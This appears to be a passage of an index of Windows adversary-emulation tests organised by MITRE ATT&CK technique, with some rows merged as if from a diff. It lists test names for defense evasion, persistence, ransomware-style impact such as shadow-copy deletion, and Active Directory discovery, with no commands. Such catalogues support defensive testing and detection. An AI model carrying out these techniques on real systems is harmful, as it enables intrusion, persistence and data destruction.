196 defense-evasion T1036.003 Rename System Utilities 8 Malicious process Masquerading as LSM.exe 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f command_prompt
197 defense-evasion T1036.003 Rename System Utilities 9 File Extension Masquerading c7fa0c3b-b57f-4cba-9118-863bf4e653fc command_prompt
198 defense-evasion T1207 Rogue Domain Controller 1 DCShadow (Active Directory) DCShadow - Mimikatz 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 powershell manual
199 defense-evasion T1564.006 T1014 Run Virtual Instance Rootkit 1 3 Register Portable Virtualbox Windows Signed Driver Rootkit Test c59f246a-34f8-4e4d-9276-c295ef9ba0dd 8e4e1985-9a19-4529-b4b8-b7a49ff87fae command_prompt
defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
200 defense-evasion T1218.011 Rundll32 1 Rundll32 execute JavaScript Remote Payload With GetObject cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be command_prompt
201 defense-evasion T1218.011 Rundll32 2 Rundll32 execute VBscript command 638730e7-7aed-43dc-bf8c-8117f805f5bb command_prompt
202 defense-evasion T1218.011 Rundll32 3 Rundll32 advpack.dll Execution d91cae26-7fc1-457b-a854-34c8aad48c89 command_prompt
203 defense-evasion T1218.011 Rundll32 4 Rundll32 ieadvpack.dll Execution 5e46a58e-cbf6-45ef-a289-ed7754603df9 command_prompt
204 defense-evasion T1218.011 Rundll32 5 Rundll32 syssetup.dll Execution 41fa324a-3946-401e-bbdd-d7991c628125 command_prompt
205 defense-evasion T1218.011 Rundll32 6 Rundll32 setupapi.dll Execution 71d771cd-d6b3-4f34-bc76-a63d47a10b19 command_prompt
defense-evasion T1218.011 Rundll32 7 Execution of HTA and VBS Files using Rundll32 and URL.dll 22cfde89-befe-4e15-9753-47306b37a6e3 command_prompt
defense-evasion T1218.011 Rundll32 8 Launches an executable using Rundll32 and pcwutl.dll 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 command_prompt
defense-evasion T1218.011 Rundll32 9 Execution of non-dll using rundll32.exe ae3a8605-b26e-457c-b6b3-2702fd335bac powershell
defense-evasion T1218.011 Rundll32 10 Rundll32 with Ordinal Value 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0 command_prompt
defense-evasion T1218.011 Rundll32 11 Rundll32 with Control_RunDLL e4c04b6f-c492-4782-82c7-3bf75eb8077e command_prompt
defense-evasion T1218.011 Rundll32 12 Rundll32 with desk.cpl 83a95136-a496-423c-81d3-1c6750133917 command_prompt
defense-evasion T1134.005 SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
206 defense-evasion T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
defense-evasion T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
207 defense-evasion T1218 Signed Binary Proxy Execution 1 mavinject - Inject DLL into running process c426dacf-575d-4937-8611-a148a86a5e61 command_prompt
208 defense-evasion T1218 Signed Binary Proxy Execution 2 SyncAppvPublishingServer - Execute arbitrary PowerShell code d590097e-d402-44e2-ad72-2c6aa1ce78b1 command_prompt
209 defense-evasion T1218 Signed Binary Proxy Execution 3 Register-CimProvider - Execute evil dll ad2c17ed-f626-4061-b21e-b9804a6f3655 command_prompt
210 defense-evasion T1218 Signed Binary Proxy Execution 4 InfDefaultInstall.exe .inf Execution 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef command_prompt
211 defense-evasion T1218 Signed Binary Proxy Execution 5 ProtocolHandler.exe Downloaded a Suspicious File db020456-125b-4c8b-a4a7-487df8afb5a2 command_prompt
defense-evasion T1218 Signed Binary Proxy Execution 6 Microsoft.Workflow.Compiler.exe Payload Execution 7cbb0f26-a4c1-4f77-b180-a009aa05637e powershell
defense-evasion T1218 Signed Binary Proxy Execution 7 Renamed Microsoft.Workflow.Compiler.exe Payload Executions 4cc40fd7-87b8-4b16-b2d7-57534b86b911 powershell
defense-evasion T1218 Signed Binary Proxy Execution 8 Invoke-ATHRemoteFXvGPUDisablementCommand base test 9ebe7901-7edf-45c0-b5c7-8366300919db powershell
defense-evasion T1218 Signed Binary Proxy Execution 9 DiskShadow Command Execution 0e1483ba-8f0c-425d-b8c6-42736e058eaa powershell
defense-evasion T1218 Signed Binary Proxy Execution 10 Load Arbitrary DLL via Wuauclt (Windows Update Client) 49fbd548-49e9-4bb7-94a6-3769613912b8 command_prompt
212 defense-evasion T1216 Signed Script Proxy Execution 1 SyncAppvPublishingServer Signed Script PowerShell Command Execution 275d963d-3f36-476c-8bef-a2a3960ee6eb command_prompt
213 defense-evasion T1216 Signed Script Proxy Execution 2 manage-bde.wsf Signed Script Command Execution 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a command_prompt
214 defense-evasion T1497.001 System Checks 2 Detect Virtualization Environment (Windows) 502a7dc4-9d6f-4d28-abf2-f0e84692562d powershell
defense-evasion T1497.001 System Checks 4 Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) 4a41089a-48e0-47aa-82cb-5b81a463bc78 powershell
defense-evasion T1221 Template Injection 1 WINWORD Remote Template Injection 1489e08a-82c7-44ee-b769-51b72d03521d command_prompt
215 defense-evasion T1070.006 Timestomp 5 Windows - Modify file creation timestamp with PowerShell b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c powershell
216 defense-evasion T1070.006 Timestomp 6 Windows - Modify file last modified timestamp with PowerShell f8f6634d-93e1-4238-8510-f8a90a20dcf2 powershell
217 defense-evasion T1070.006 Timestomp 7 Windows - Modify file last access timestamp with PowerShell da627f63-b9bd-4431-b6f8-c5b44d061a62 powershell
221 defense-evasion T1222.001 Windows File and Directory Permissions Modification 1 Take ownership using takeown utility 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 command_prompt
222 defense-evasion T1222.001 Windows File and Directory Permissions Modification 2 cacls - Grant permission to specified user or group recursively a8206bcc-f282-40a9-a389-05d9c0263485 command_prompt
223 defense-evasion T1222.001 Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
224 defense-evasion T1222.001 Windows File and Directory Permissions Modification 4 attrib - hide file Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style 32b979da-7b68-42c9-9a99-0e39900fc36c ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt powershell
defense-evasion T1222.001 Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
225 defense-evasion T1220 XSL Script Processing 1 MSXSL Bypass using local files ca23bfb2-023f-49c5-8802-e66997de462d command_prompt
226 defense-evasion T1220 XSL Script Processing 2 MSXSL Bypass using remote files a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 command_prompt
227 defense-evasion T1220 XSL Script Processing 3 WMIC bypass using local XSL file 1b237334-3e21-4a0c-8178-b8c996124988 command_prompt
228 defense-evasion T1220 XSL Script Processing 4 WMIC bypass using remote XSL file 7f5be499-33be-4129-a560-66021f379b9b command_prompt
229 persistence T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
persistence T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
230 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
231 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
persistence T1098 Account Manipulation 9 Password Change on Directory Service Restore Mode (DSRM) Account d5b886d9-d1c7-4b6e-a7b0-460041bf2823 command_prompt
persistence T1137.006 Add-ins 1 Code Executed Via Excel Add-in File (Xll) 441b1a0f-a771-428a-8af0-e99e4698cda3 powershell
232 persistence T1546.010 AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
233 persistence T1546.011 Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
234 persistence T1546.011 Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
235 persistence T1546.011 Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
236 persistence T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
persistence T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
237 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
238 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
239 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
240 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) Bits download using destktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
persistence T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
241 persistence T1176 Browser Extensions 1 Chrome (Developer Mode) 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 manual
242 persistence T1176 Browser Extensions 2 Chrome (Chrome Web Store) 4c83940d-8ca5-4bb2-8100-f46dc914bc3f manual
243 persistence T1176 Browser Extensions 3 Firefox cb790029-17e6-4c43-b96f-002ce5f10938 manual
246 persistence T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
247 persistence T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
248 persistence T1546.001 Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
persistence T1546.015 Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
persistence T1546.015 Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
249 persistence T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
250 persistence T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
251 persistence T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
persistence T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
252 persistence T1136.002 Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
253 persistence T1136.002 Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
persistence T1136.002 Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
persistence T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
254 persistence T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
255 persistence T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
256 persistence T1136.001 Local Account 3 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
257 persistence T1136.001 Local Account 4 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
258 persistence T1136.001 Local Account 6 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
persistence T1078.003 Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
259 persistence T1037.001 Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
260 persistence T1546.007 Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
261 persistence T1137 T1137.002 Office Application Startup Office Test 1 Office Application Startup - Outlook as a C2 Office Apllication Startup Test Persistence bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c c3e35b58-fe1c-480b-b540-7600fb612563 command_prompt
persistence T1137.002 Office Test 1 Office Application Startup Test Persistence c3e35b58-fe1c-480b-b540-7600fb612563 command_prompt
persistence T1137.004 Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
persistence T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
262 persistence T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
263 persistence T1547.010 Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
264 persistence T1546.013 PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
268 persistence T1547.001 Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
269 persistence T1547.001 Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
270 persistence T1547.001 Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
persistence T1547.001 Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
persistence T1547.001 Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
persistence T1547.001 Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
271 persistence T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
272 persistence T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
273 persistence T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
274 persistence T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
persistence T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
persistence T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
persistence T1053.005 Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
275 persistence T1546.002 Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
276 persistence T1547.005 Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
277 persistence T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
persistence T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
278 persistence T1547.009 Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
279 persistence T1547.009 Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
280 persistence T1505.002 Transport Agent 1 Install MS Exchange Transport Agent Persistence 43e92449-ff60-46e9-83a3-1a38089df94d powershell
283 persistence T1543.003 Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
284 persistence T1543.003 Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
285 persistence T1543.003 Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
persistence T1543.003 Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
286 persistence T1547.004 Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
287 persistence T1547.004 Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
288 persistence T1547.004 Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
290 impact T1531 Account Access Removal 2 Delete User - Windows f21a1d7d-a62f-442a-8c3a-2440d43b19e5 command_prompt
291 impact T1531 Account Access Removal 3 Remove Account From Domain Admin Group 43f71395-6c37-498e-ab17-897d814a0947 powershell
292 impact T1485 Data Destruction 1 Windows - Overwrite file with Sysinternals SDelete 476419b5-aebf-4366-a131-ae3e8dae5fc2 powershell
impact T1485 Data Destruction 3 Overwrite deleted data on C drive 321fd25e-0007-417f-adec-33232252be19 command_prompt
impact T1486 Data Encrypted for Impact 5 PureLocker Ransom Note 649349c7-9abf-493b-a7a2-b1aa4d141528 command_prompt
293 impact T1490 Inhibit System Recovery 1 Windows - Delete Volume Shadow Copies 43819286-91a9-4369-90ed-d31fb4da2c01 command_prompt
294 impact T1490 Inhibit System Recovery 2 Windows - Delete Volume Shadow Copies via WMI 6a3ff8dd-f49c-4272-a658-11c2fe58bd88 command_prompt
295 impact T1490 Inhibit System Recovery 3 Windows - wbadmin Delete Windows Backup Catalog Windows - Delete Windows Backup Catalog 263ba6cb-ea2b-41c9-9d4e-b652dadd002c command_prompt
296 impact T1490 Inhibit System Recovery 4 Windows - Disable Windows Recovery Console Repair cf21060a-80b3-4238-a595-22525de4ab81 command_prompt
297 impact T1490 Inhibit System Recovery 5 Windows - Delete Volume Shadow Copies via WMI with PowerShell 39a295ca-7059-4a88-86f6-09556c1211e7 powershell
298 impact T1490 Inhibit System Recovery 6 Windows - Delete Backup Files 6b1dbaf6-cc8a-4ea6-891f-6058569653bf command_prompt
impact T1490 Inhibit System Recovery 7 Windows - wbadmin Delete systemstatebackup 584331dd-75bc-4c02-9e0b-17f5fd81c748 command_prompt
impact T1490 Inhibit System Recovery 8 Windows - Disable the SR scheduled task 1c68c68d-83a4-4981-974e-8993055fa034 command_prompt
impact T1490 Inhibit System Recovery 9 Disable System Restore Through Registry 66e647d1-8741-4e43-b7c1-334760c2047f command_prompt
impact T1491.001 Internal Defacement 1 Replace Desktop Wallpaper 30558d53-9d76-41c4-9267-a7bd5184bed3 powershell
299 impact T1489 Service Stop 1 Windows - Stop service using Service Controller 21dfb440-830d-4c86-a3e5-2a491d5a8d04 command_prompt
300 impact T1489 Service Stop 2 Windows - Stop service using net.exe 41274289-ec9c-4213-bea4-e43c4aa57954 command_prompt
301 impact T1489 Service Stop 3 Windows - Stop service by killing process f3191b84-c38b-400b-867e-3a217a27795f command_prompt
302 impact T1529 System Shutdown/Reboot 1 Shutdown System - Windows ad254fa8-45c0-403b-8c77-e00b3d3e7a64 command_prompt
303 impact T1529 System Shutdown/Reboot 2 Restart System - Windows f4648f0d-bf78-483c-bafc-3ec99cd1c302 command_prompt
304 discovery T1010 Application Window Discovery 1 List Process Main Windows - C# .NET fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4 command_prompt
305 discovery T1217 Browser Bookmark Discovery 4 List Google Chrome / Opera Bookmarks on Windows with powershell List Google Chrome Bookmarks on Windows with powershell faab755e-4299-48ec-8202-fc7885eb6545 powershell
306 discovery T1217 Browser Bookmark Discovery 5 List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt 76f71e2f-480e-4bed-b61e-398fe17499d5 command_prompt
307 discovery T1217 Browser Bookmark Discovery 6 List Mozilla Firefox bookmarks on Windows with command prompt 4312cdbc-79fc-4a9c-becc-53d49c734bc5 command_prompt
308 discovery T1217 Browser Bookmark Discovery 7 List Internet Explorer Bookmarks using the command prompt 727dbcdb-e495-4ab1-a6c4-80c7f77aef85 command_prompt
310 discovery T1087.002 Domain Account 2 Enumerate all accounts via PowerShell (Domain) 8b8a6449-be98-4f42-afd2-dedddc7453b2 powershell
311 discovery T1087.002 Domain Account 3 Enumerate logged on users via CMD (Domain) 161dcd85-d014-4f5e-900c-d3eaae82a0f7 command_prompt
312 discovery T1087.002 Domain Account 4 Automated AD Recon (ADRecon) 95018438-454a-468c-a0fa-59c800149b59 powershell
313 discovery T1087.002 Domain Account 5 Adfind -Listing password policy 736b4f53-f400-4c22-855d-1a6b5a551600 command_prompt powershell
discovery T1087.002 Domain Account 6 Adfind - Enumerate Active Directory Admins b95fd967-4e62-4109-b48d-265edfd28c3a command_prompt
discovery T1087.002 Domain Account 7 Adfind - Enumerate Active Directory User Objects e1ec8d20-509a-4b9a-b820-06c9b2da8eb7 command_prompt
discovery T1087.002 Domain Account 8 Adfind - Enumerate Active Directory Exchange AD Objects 5e2938fb-f919-47b6-8b29-2f6a1f718e99 command_prompt
discovery T1087.002 Domain Account 9 Enumerate Default Domain Admin Details (Domain) c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef command_prompt
discovery T1087.002 Domain Account 10 Enumerate Active Directory for Unconstrained Delegation 46f8dbe9-22a5-4770-8513-66119c5be63b powershell
discovery T1087.002 Domain Account 11 Get-DomainUser with PowerView 93662494-5ed7-4454-a04c-8c8372808ac2 powershell
discovery T1087.002 Domain Account 12 Enumerate Active Directory Users with ADSISearcher 02e8be5a-3065-4e54-8cc8-a14d138834d3 powershell
discovery T1087.002 Domain Account 13 Enumerate Linked Policies In ADSISearcher Discovery 7ab0205a-34e4-4a44-9b04-e1541d1a57be powershell
discovery T1087.002 Domain Account 14 Enumerate Root Domain linked policies Discovery 00c652e2-0750-4ca6-82ff-0204684a6fe4 powershell
314 discovery T1069.002 Domain Groups 1 Basic Permission Groups Discovery Windows (Domain) dd66d77d-8998-48c0-8024-df263dc2ce5d command_prompt
315 discovery T1069.002 Domain Groups 2 Permission Groups Discovery PowerShell (Domain) 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7 powershell
316 discovery T1069.002 Domain Groups 3 Elevated group enumeration using net group (Domain) 0afb5163-8181-432e-9405-4322710c0c37 command_prompt
318 discovery T1069.002 Domain Groups 5 Find local admins on all machines in domain (PowerView) a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd powershell
319 discovery T1069.002 Domain Groups 6 Find Local Admins via Group Policy (PowerView) 64fdb43b-5259-467a-b000-1b02c00e510a powershell
320 discovery T1069.002 Domain Groups 7 Enumerate Users Not Requiring Pre Auth (ASRepRoast) 870ba71e-6858-4f6d-895c-bb6237f6121b powershell
discovery T1069.002 Domain Groups 8 Adfind - Query Active Directory Groups 48ddc687-82af-40b7-8472-ff1e742e8274 command_prompt
discovery T1069.002 Domain Groups 9 Enumerate Active Directory Groups with Get-AdGroup 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 powershell
discovery T1069.002 Domain Groups 10 Enumerate Active Directory Groups with ADSISearcher 9f4e344b-8434-41b3-85b1-d38f29d148d0 powershell
discovery T1069.002 Domain Groups 11 Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) 43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8 powershell
discovery T1069.002 Domain Groups 12 Get-DomainGroupMember with PowerView 46352f40-f283-4fe5-b56d-d9a71750e145 powershell
discovery T1069.002 Domain Groups 13 Get-DomainGroup with PowerView 5a8a181c-2c8e-478d-a943-549305a01230 powershell
321 discovery T1482 Domain Trust Discovery 1 Windows - Discover domain trusts with dsquery 4700a710-c821-4e17-a3ec-9e4c81d6845f command_prompt
322 discovery T1482 Domain Trust Discovery 2 Windows - Discover domain trusts with nltest 2e22641d-0498-48d2-b9ff-c71e496ccdbe command_prompt
323 discovery T1482 Domain Trust Discovery 3 Powershell enumerate domains and forests c58fbc62-8a62-489e-8f2d-3565d7d96f30 powershell
discovery T1482 Domain Trust Discovery 4 Adfind - Enumerate Active Directory OUs d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec command_prompt
discovery T1482 Domain Trust Discovery 5 Adfind - Enumerate Active Directory Trusts 15fe436d-e771-4ff3-b655-2dca9ba52834 command_prompt
discovery T1482 Domain Trust Discovery 6 Get-DomainTrust with PowerView f974894c-5991-4b19-aaf5-7cc2fe298c5d powershell
discovery T1482 Domain Trust Discovery 7 Get-ForestTrust with PowerView 58ed10e8-0738-4651-8408-3a3e9a526279 powershell
324 discovery T1083 File and Directory Discovery 1 File and Directory Discovery (cmd.exe) 0e36303b-6762-4500-b003-127743b80ba6 command_prompt
325 discovery T1083 File and Directory Discovery 2 File and Directory Discovery (PowerShell) 2158908e-b7ef-4c21-8a83-3ce4dd05a924 powershell
discovery T1083 File and Directory Discovery 5 Simulating MAZE Directory Enumeration c6c34f61-1c3e-40fb-8a58-d017d88286d8 powershell
discovery T1615 Group Policy Discovery 1 Display group policy information via gpresult 0976990f-53b1-4d3f-a185-6df5be429d3b command_prompt
discovery T1615 Group Policy Discovery 2 Get-DomainGPO to display group policy information via PowerView 4e524c4e-0e02-49aa-8df5-93f3f7959b9f powershell
326 discovery T1087.001 Local Account 8 Enumerate all accounts on Windows (Local) 80887bec-5a9b-4efc-a81d-f83eb2eb32ab command_prompt
327 discovery T1087.001 Local Account 9 Enumerate all accounts via PowerShell (Local) ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b powershell
328 discovery T1087.001 Local Account 10 Enumerate logged on users via CMD (Local) a138085e-bfe5-46ba-a242-74a6fb884af3 command_prompt
329 discovery T1087.001 Local Account 11 Enumerate logged on users via PowerShell 2bdc42c7-8907-40c2-9c2b-42919a00fe03 powershell
330 discovery T1069.001 Local Groups 2 Basic Permission Groups Discovery Windows (Local) 1f454dd6-e134-44df-bebb-67de70fb6cd8 command_prompt
331 discovery T1069.001 Local Groups 3 Permission Groups Discovery PowerShell (Local) a580462d-2c19-4bc7-8b9a-57a41b7d3ba4 powershell
discovery T1069.001 Local Groups 4 SharpHound3 - LocalAdmin e03ada14-0980-4107-aff1-7783b2b59bb1 powershell
discovery T1069.001 Local Groups 5 Wmic Group Discovery 7413be50-be8e-430f-ad4d-07bf197884b2 powershell
discovery T1069.001 Local Groups 6 WMIObject Group Discovery 69119e58-96db-4110-ad27-954e48f3bb13 powershell
332 discovery T1046 Network Service Scanning 3 Port Scan NMap for Windows d696a3cb-d7a8-4976-8eb5-5af4abf2e3df powershell
333 discovery T1046 T1135 Network Service Scanning Network Share Discovery 4 2 Port Scan using python Network Share Discovery command prompt 6ca45b04-9f15-4424-b9d3-84a217285a5c 20f1097d-81c1-405c-8380-32174d493bbb powershell command_prompt
334 discovery T1135 Network Share Discovery 3 Network Share Discovery command prompt Network Share Discovery PowerShell 20f1097d-81c1-405c-8380-32174d493bbb 1b0814d1-bb24-402d-9615-1b20c50733fb command_prompt powershell
335 discovery T1135 Network Share Discovery 4 Network Share Discovery PowerShell View available share drives 1b0814d1-bb24-402d-9615-1b20c50733fb ab39a04f-0c93-4540-9ff2-83f862c385ae powershell command_prompt
336 discovery T1135 Network Share Discovery 5 View available share drives Share Discovery with PowerView ab39a04f-0c93-4540-9ff2-83f862c385ae b1636f0a-ba82-435c-b699-0d78794d8bfd command_prompt powershell
discovery T1135 Network Share Discovery 6 Share Discovery with PowerView b1636f0a-ba82-435c-b699-0d78794d8bfd powershell
discovery T1135 Network Share Discovery 7 PowerView ShareFinder d07e4cc1-98ae-447e-9d31-36cb430d28c4 powershell
337 discovery T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
338 discovery T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
339 discovery T1201 Password Policy Discovery 5 Examine local password policy - Windows 4588d243-f24e-4549-b2e3-e627acc089f6 command_prompt
340 discovery T1201 Password Policy Discovery 6 Examine domain password policy - Windows 46c2c362-2679-4ef5-aec9-0e958e135be4 command_prompt
discovery T1201 Password Policy Discovery 8 Get-DomainPolicy with PowerView 3177f4da-3d4b-4592-8bdc-aa23d0b2e843 powershell
discovery T1201 Password Policy Discovery 9 Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy b2698b33-984c-4a1c-93bb-e4ba72a0babb powershell
discovery T1120 Peripheral Device Discovery 1 Win32_PnPEntity Hardware Inventory 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 powershell
341 discovery T1057 Process Discovery 2 Process Discovery - tasklist c5806a4f-62b8-4900-980b-c7ec004e9908 command_prompt
